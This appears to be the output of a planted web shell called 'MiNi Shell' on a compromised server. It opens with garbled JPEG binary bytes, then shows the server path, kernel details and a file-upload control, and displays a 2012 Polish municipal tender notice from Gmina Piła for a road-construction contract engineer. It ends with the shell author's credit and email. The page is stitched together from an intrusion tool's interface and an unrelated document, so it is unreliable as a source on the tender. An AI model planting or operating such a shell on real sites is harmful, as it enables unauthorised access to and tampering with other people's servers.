JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/69213-N-2012.html

<p class="kh_header"><b>Piła: Pełnienie funkcji wielobranżowego Inżyniera Kontraktu nad realizacją inwestycji pt. Budowa ul. Piłsudskiego w Pile.</b><br>
<b>Numer ogłoszenia: 69213 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji wielobranżowego Inżyniera Kontraktu nad realizacją inwestycji pt. Budowa ul. Piłsudskiego w Pile..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji wielobranżowego Inżyniera Kontraktu nad realizacją inwestycji pt. Budowa ul. Piłsudskiego w Pile.

Budowa ul. Piłsudskiego w Pile od ul. 11 Listopada do ul. 1 Maja, która obejmuje przebudowę skrzyżowania drogi krajowej Nr 11 (Aleja Piastów) oraz budowę ulicy Piłsudskiego (od ul. 11 Listopada do Al. Piastów), w tym:
  1. Zakres  robót budowlanych i urządzeniowych:
 a) rozbiórka budynku kolidujacego z nowym przebiegiem ulicy ;
 b) rozbiórki zwiazane z budową nawierzchni jezdni, zjazdów i chodników oraz skrzyżowań z innymi drogami publicznymi wraz z infrastrukturą;
 c) wykonanie konstrukcji nawierzchni;
 d) wykonanie konstrukcji nawierzchni chodników i zjazdów; 
 e) budowy odwodnienia - sieć kanalizacji deszczowej, przykanaliki wraz z wpustami
     deszczowymi ulicznymi,
 f) budowa i przebudowa oświetlenia drogowego, 
 g) przebudowa sygnalizacji świetlnej (rozbiórka i budowa) wraz ze sterowaniem oraz  z usunięciem kolizji elektroenergetycznych, 
 h) montaż zabezpieczeń na kolidujacych kablach  telekomunikacyjnych i energetycznych, 
 i) zabezpieczenie i przebudowa kanałów, komór i innych urządzeń infrastruktury podziemnej,
 j) docelowe oznakowanie poziome i pionowe,
 k) regulacja istniejących urządzeń na kanale sanitarnym;
 l) regulacja istniejacych urządzeń wodociągowych;
 m) regulacja istniejacych urządzeń telekomunikacyjnych;
 n) urządzenie zieleni miejskiej w tym wycinka drzew;
 o) roboty wykończeniowe i porządkowe,

Z projektem budowlanym wraz z częścią kosztorysową oraz Specyfikacja Techniczna Wykonania i Odbioru Robót można się zapoznać na stronie internetowej: BIP Piła - Zamówienia Publiczne - Gmina Piła - Nr zamówienia 34-ZP-2012 (www.bip.um.pila.pl)

Szacunkowe koszty robót budowlano-montażowych wg kosztorysu inwestorskiego to około  4,9 mln zł. brutto. 

Przedmiot zamówienia dla Inżyniera Kontraktu:
Inżynier Kontraktu będzie występował jako Inspektor Nadzoru z ramienia Zamawiającego, zgodnie z  polskim Prawem Budowlanym.
 Podstawowe obowiązki Inżyniera Kontraktu:
1.  zapoznanie się z dokumentacją techniczną inwestycji;
2.  kontrola nad właściwym i terminowym wdrażaniem inwestycji;
3.  administrowanie i zarządzanie robotami będącymi przedmiotem umowy na wykonanie robót budowlanych, w zakresie wynikającym z warunków zawartych w tej umowie;
4.  reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji;
5.  monitorowanie postępu prac, włącznie ze składaniem comiesięcznych raportów rzeczowo-finansowych, w których będą wzięte pod uwagę zarówno wskaźniki fizyczne, jak i finansowe. Dodatkowo Inżynier kontraktu będzie zobowiązany do przedstawienia raportu  końcowego po zakończeniu realizacji budowy. Raporty miesięczne winny być składane w wersji papierowej (2 egzemplarze) oraz w wersji elektronicznej do 5 dnia roboczego każdego miesiąca. Złożenie raportu jest wymaganiem niezbędnym dla podpisania comiesięczego protokołu odbioru usługi; 
6.  przygotowywanie w wersji papierowej i elektronicznej co miesiąc w terminie jak wyżej krótkiej notatki informacyjnej wraz ze zdjęciami na temat stanu realizacji i zaawansowania budowy. Jest ona niezbędna do realizacji polityki informacyjnej miasta;
7.  zabezpieczenie profesjonalnego i kompletnego nadzoru inwestorskiego nad prowadzonymi robotami: drogowymi, sanitarnymi, elektrycznymi, telekomunikacyjnymi, urządzaniem zieleni;
8.  zapewnienie codziennej dyspozycyjności   i pobytu nadzoru na placu budowy. Obecność dotyczy osoby Inżyniera Kontraktu i lub inspektorów nadzoru; 
9.  w ramach czynności kontrolnych zapewnienie nadzoru geodezyjnego (własny lub zlecony);
10.  nadzór i akceptacja przeprowadzonych testów i technologicznych rozruchów;
11.  zapewnienie zgodności wykonanych robót z technicznymi i umownymi wymaganiami wykonania robót;
12.  nadzór rzeczowo-terminowy w zakresie przygotowania dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie, zgłoszenia zakończenia robót, etc.;   
13.  rzeczowe i finansowe rozliczenie robót wynikających z zawartej umowy;
14.  zachowanie poufności informacji.

Przewiduje się, że zakres zadań Inżyniera Kontraktu będzie także obejmował prowadzenie następujących działań:
A) zadania podczas realizacji zadania inwestycyjnego, w tym:
utrzymywanie na bieżąco łączności i sprawozdawczości między wszystkimi uczestnikami  inwestycji,
dokonywanie sprawdzenia dokumentacji technicznej, a w razie potrzeby wnioskowania do   Zamawiającego o dokonanie w niej zmian i uzupełnień,
kontrola nad zgodnością realizacji robót  z odpowiednimi wymaganiami bezpieczeństwa I    ochrony zdrowia,
akceptowanie PZJ (Programu Zapewnienia Jakości),
sprawdzanie poprawności kalkulacji sporządzonych przez Wykonawcę robót w zakresie    obmiarów robót, nakładów rzeczowych, cen i narzutów oraz faktur w terminach wynikających z    zawartych między Wykonawcą a Zamawiającym, umów,
współpraca z nadzorem autorskim w okresie realizacji robót,
koordynacja robót wykonywanych w ramach robót zleconych przez Gminę z robotami    budowlanymi zwiazanymi z przebudową sieci wodociągowej w rejonie skrzyżowania   prowadzonymi przez MWiK w Pile;
zatwierdzanie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich   zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną,
organizowanie testów jakości przez specjalistyczne instytuty, na prośbę Zamawiającego,
sprawdzanie prawidłowości i autentyczności wszystkich certyfikatów, praw własności, itd., za   które Wykonawca jest odpowiedzialny zgodnie z warunkami umowy na roboty budowlane,
zatwierdzanie proponowanych metod wykonywania robót budowlanych, włączając w to roboty  tymczasowe, zaproponowane przez Wykonawcę,
kontrolowanie wytwórni materiałów, prefabrykatów mas bitumicznych w celu sprawdzenia    zgodności i akceptacji stosowania metod wytwarzania, 
kontrolowanie zgodności wykonanych robót z dokumentacją projektową, umową I
   obowiązującym w trakcie realizacji harmonogramem robót,
rozstrzyganie w uzgodnieniu z Zamawiającym spraw technicznych powstałych w toku   wykonywania robót,
rekomendowanie wszystkich zmian w planach i specyfikacjach, które mogą okazać się    niezbędne lub pożądane podczas lub w następstwie wykonywania robót budowlanych,
szacowanie i weryfikowanie robót dodatkowych zaproponowanych przez Wykonawcę, w  zakresie wartości fizycznych i finansowych, 
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości robót, przed ich    zatwierdzeniem Wykonawcy;
negocjowanie z Wykonawcą i pisemne rekomendowanie Zamawiającemu na bieżąco wszystkich   robót spoza harmonogramu,
sporządzanie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub    zamiennych, uzasadnienie potrzeby wykonywania tych prac oraz wnioskowanie do    Zamawiającego o ich wykonanie,
sprawdzanie ilości i jakości wykonywanych robót, dokonywanie odbiorów częściowych,
   dokonywanie odbioru robót zanikających,
uczestniczenie w odbiorach i próbach technicznych instalacji i urządzeń,
wykonywanie dokumentacji fotograficznej przed, podczas prowadzenia inwestycji oraz po jej    zakończeniu,
potwierdzanie gotowości do odbioru robót lub urządzeń,
uczestniczenie w czynnościach odbioru robót i przekazania do użytkowania,
pełnych rozliczeń końcowych budowy oraz poszczególnych etapów, przygotowanie danych    merytorycznych do dokumentów OT dla przedmiotowego zadania, zgodnie z obowiązującymi    przepisami księgowymi,
informowanie Zamawiającego na bieżąco o postępach w realizacji robót, stwierdzonych   nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z harmonogramu robót    oraz informowanie o sposobach ich rozwiązywania i lub działaniami korygującymi, mającymi na
   celu usuwanie tych problemów,
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty budowlane,
ocenianie i rozstrzyganie wszelkich roszczeń, związanych z realizacją umowy, problemów    powstałych podczas robót, zapobieganie sporom i opóźnieniom, gdy jest to wykonalne,
sprawdzanie kompletności dokumentacji powykonawczej i dostarczenie jej do Zamawiającego
   wraz z dokumentacją dotyczącą nadzorowanych robót, w formie uzgodnionej z Zamawiającym,
organizowanie odbioru końcowego i sporządzenie Protokołu Odbioru, Listy Usterek
   innych dokumentów związanych z warunkami umowy dotyczącymi realizacji projektu,

B) Zadania podczas okresu zgłaszania wad.
Po zakończeniu robót,  Inżynier Kontraktu będzie obsługiwał okres udzielonej przez Wykonawcę robót rękojmi i gwarancji. Inżynier Kontraktu będzie uczestniczył w nadzorowaniu przeglądów gwarancyjnych, końcowych akceptacji i rozwiązywaniu sporów. W szczególności zadania te polegać będą na: 
organizowaniu i uczestnictwie w przeglądach gwarancyjnych (minimum raz w roku),
każdorazowe uczestnictwo w przeglądach w przypadku pojawieniia się wad,
             zgłaszanych Wykonawcy robót,  
okresowej inspekcji wad usuwanych przez Wykonawcę, 
przygotowaniu i wydanie końcowego raportu przed upływem terminu rękojmi i terminu
             gwarancji,
uczestnictwo w rozwiązywaniu sporów wynikłych na tle realizacji umowy o roboty
             budowlane,
zarekomendowanie zwrotu zobowiązań wynikających z umowy z Wykonawcą robót. 

C) Dodatkowo do zadań Inżyniera Kontraktu należeć będzie:
organizowanie, w porozumieniu z Zamawiającym, cyklicznych narad koordynacyjnych dotyczących budowy (co najmniej raz na dwa tygodniew miesiącu, a jeśli zajdzie potrzeba lub na życzenie Zamawiającego, raz w tygodniu) oraz przygotowanie notatek w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót,
sporządzanie protokołów spotkań,
prowadzenie ewidencji wizyt przedstawicieli Inżyniera Kontraktu, Zamawiającego oraz innych Instytucji zaangażowanych w realizację projektu na placu budowy;
 zapewnienie we własnym zakresie dla pracy swojego zespołu pomieszczeń biurowych, wyposażonych w stosowne środki łączności, obsługę komputerową itp. Wymaga się, by Inżynier Kontraktu posiadał na budowie adres e-mail do korespondencji elektronicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: wykonał co najmniej dwie usługi, polegające na nadzorze inwestycji obejmującej budowę lub przebudowę drogi. Wartość nadzorowanych robót minimum  2 mln PLN brutto każda; Wskazane roboty winny być zakończone i rozliczone, to znaczy  doprowadzone do świadectwa  przejęcia lub odbioru końcowego. 
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów o których mowa w SIWZ, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje osobami legitymującymi się doświadczeniem i kwalifikacjami do stanowisk, jakie zostaną tym osobom powierzone. Wykonawca przedstawi w ofercie kandydatów na każde niżej wymienione stanowisko, spełniających poniższe wymagania, przy czym dopuszcza sie możliwość łączenia przez jedną osobę tylko dóch funkcji : 
Kierownik zespołu - Inżynier Rezydent  - minimum 5-letnie doświadczenie zawodowe w zarządzaniu, nadzorowaniu i rozliczaniu robót budowlanych przy minimum 2 projektach, o zakresie i złożoności porównywalnej z przedmiotem niniejszego przetargu.  Osoba ta winna posiadać uprawnienia do kierowania lub nadzorowania robotami budowlanymi specjalności drogowej i/lub konstrukcyjno-budowlanej z przynależnością do właściwej Izby Inżynierów Budownictwa).  Inżynier Kontraktu może pełnić funkcję jednego z inspektorów nadzoru,
Inspektor nadzoru robót drogowych - co najmniej 5-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót drogowych po uzyskaniu uprawnień budowlanych, Osoba ta powinna posiadać uprawnienia budowlane bez ograniczeń do kierowania lub nadzorowania robót o specjalności drogowej,
Inspektor nadzoru robót wodociagowo-kanalizacyjnych i gazowych - co najmniej 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót w zakresie sieci wod-kan. po uzyskaniu uprawnień budowlanych,
Inspektor nadzoru branży elektrycznej - - co najmniej 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót w zakresie sieci elektroenergetycznych po uzyskaniu uprawnień budowlanych,
Inspektor nadzoru branży telechnicznej - - co najmniej 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót w zakresie sieci telekomunikacyjnych po uzyskaniu uprawnień budowlanych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)    Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
b)    parafowany projekt  umowy  - załącznik nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na  podstawie której dokonano wyboru wykonawcy w przypadku gdy:
A.  Zmiana okresu przewidzianego na ukończenie prac:
1. zmiany spowodowane warunkami atmosferycznymi, w szczególności:
 a) klęski żywiołowe;
 b) wystąpienie na placu budowy niekorzystnych warunków pogodowych,
     uniemożliwiających  realizację cyklowych robót budowlano-montażowych, po
     pisemnym zgłoszeniu tych faktów przez Wykonawcę, nie później niż 30 dni  od
     momentu ich ustąpienia;
2.  zmiany spowodowane nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi lub  terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane obiekty  budowlane;
3. zmiany będące następstwem działania organów administracji, tj. odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę.

B.  Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1. zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy nie inne niż  spełniające warunki określone w ogłoszeniu lub SIWZ. Zmiana tych osób nie wymaga aneksu do umowy (dla skutecznej zmiany niezbędna jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
2.   siła wyższa uniemożliwiająca wykonanie przedmiotu urnowy zgodnie z SIWZ;
3.   zmiana obowiązującej stawki VAT; 
4. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, ze zmianą
      wynagrodzenia proporcjonalnie do upływu czsu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2012 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com